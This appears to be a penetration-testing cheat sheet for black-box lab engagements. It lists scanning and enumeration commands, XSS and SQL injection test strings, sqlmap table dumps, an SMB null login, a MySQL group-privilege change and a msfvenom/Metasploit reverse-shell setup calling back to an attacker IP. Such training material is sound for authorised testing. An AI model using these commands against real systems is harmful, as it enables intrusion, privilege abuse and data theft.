3 minute read

Cheat Sheet

This cheat sheet is a list of commands to help with the black box pen test engagements.


Check routing table information

$ route
$ ip route

Add a network to current route

$ ip route add via
$ route add -net netmask gw


$ nslookup mysite.com
$ dig mysite.com

Subdomain Enumeration

Footprinting & Scanning

Find live hosts with fping or nmap

$ fping -a -g 2>/dev/null | tee alive_hosts.txt
$ nmap -sn -oN alive_hosts.txt

nmap scan types

-sS: TCP SYN Scan (aka Stealth Scan)
-sT: TCP Connect Scan 
-sU: UDP Scan
-sn: Port Scan
-sV: Service Version information
-O: Operating System information

Spotting a Firewall

If an nmap TCP scan identified a well-known service, such as a web server, but cannot detect the version, then there may be a firewall in place.

For example:

80/tcp  open   http?    syn-ack ttl 64

Another example:

80/tcp  open   tcpwrapped 

“tcpwrapped” means the TCP handshake was completed, but the remote host closed the connection without receiving any data.

These are both indicators that a firewall is blocking our scan with the target!


  • Use “–reason” to see why a port is marked open or closed
  • If a “RST” packet is received, then something prevented the connection - probably a firewall!


Masscan is designed to scan thousands of IP addresses at once.

Vulnerability Assessment

Use the information from the Enumeration/Footprinting phases to find a vulnerable threat vector.

Below are some helpful Vulnerability assessment resources:

  • Searchsploit
  • ExploitDB
  • Msfconsole search command
  • Google
  • Nessus

Web Server Fingerprinting

Use netcat for HTTP banner grabbing:

$ nc <target addr> 80

Use OpenSSL for HTTPS banner grabbing:

$ openssl s_client -connect target.site:443

httprint is a web fingerprinting tool that uses signature-based technique to identify web servers. This is more accurate since sysadmins can customize web server banners.

$ httprint -P0 -h <target hosts> -s <signature file>

Directory and File Enumeration

Pick your favorite URI Enumeration tool

  • Gobuster - fast, multi-threaded scanner
  • Dirbuster - nice GUI
  • Dirb - recursively scans directories


Look to exploit user input coming from:

  • Request headers
  • Cookies
  • Form inputs
  • POST parameters
  • GET parameters

Check for XSS

<i>some text</i>

Steal cookies:


SQL Injection

Same injection points as XSS.

Boolean Injection:

  • and 1=1; – -
  • or ‘a’=’a’; – -

Once you determine that a site is vulnerable to SQLi, automate with SQL Map.

$ sqlmap -u <url>
$ sqlmap -u <url> -p <parameter>
$ sqlmap -u <url> --tables
$ sqlmap -u <url> -D <database name> -T <table name> --dump

Windows Shares Enumeration

Check what shares are available on a host

$ smbclient -L //ip 
$ enum4linux -a ip_address

SMB Null Attack

Try to login without a username or password:

$ smbclient //ip/share -N

MySQL Database commands

Login to MySQL with password

$ mysql --user=root --port=13306 -p -h
> SHOW databases;
> SHOW tables FROM databases;
> USE database;
> SELECT * FROM table;

Change table entry values

# Add the user tracking1 to the "adm" group
> update users set adm="yes" where username="tracking1";

Meterpreter reverse shell

  1. Find vulnerability in target (e.g. LFI/RFI)
  2. Set up a Metasploit listener
    use exploit/multi/handler
    set payload linux/x64/meterpreter_reverse_tcp # or any payload you wish
    set lhost <MY IP>
    set lport <PORT>  # set to a port open on the target to bypass firewall
  3. Create a matching meterpreter-based executable using msfvenom
    msfvenon -p linux/x64/meterpreter_reverse_tcp lhost=<MY IP> lport=<PORT> -f elf -o meter
  4. Upload the payload to target (e.g LFI/RFI)

Adding Virtual Hosts

In the black box practice labs, we had to add a virtual host to /etc/hosts in order to connect to the webpage.

$ sudo vim /etc/hosts
<IP addr>	static.foobar.org


  • Found a webshell/admin panel on a site?
    • Run phpinfo(); to determine if it is a PHP shell
  • Try to get a reverse shell connection
  • Check for flag in the user’s home directory
  • Enumerate, enumerate, enumerate

Big Thanks for JasonTurley.
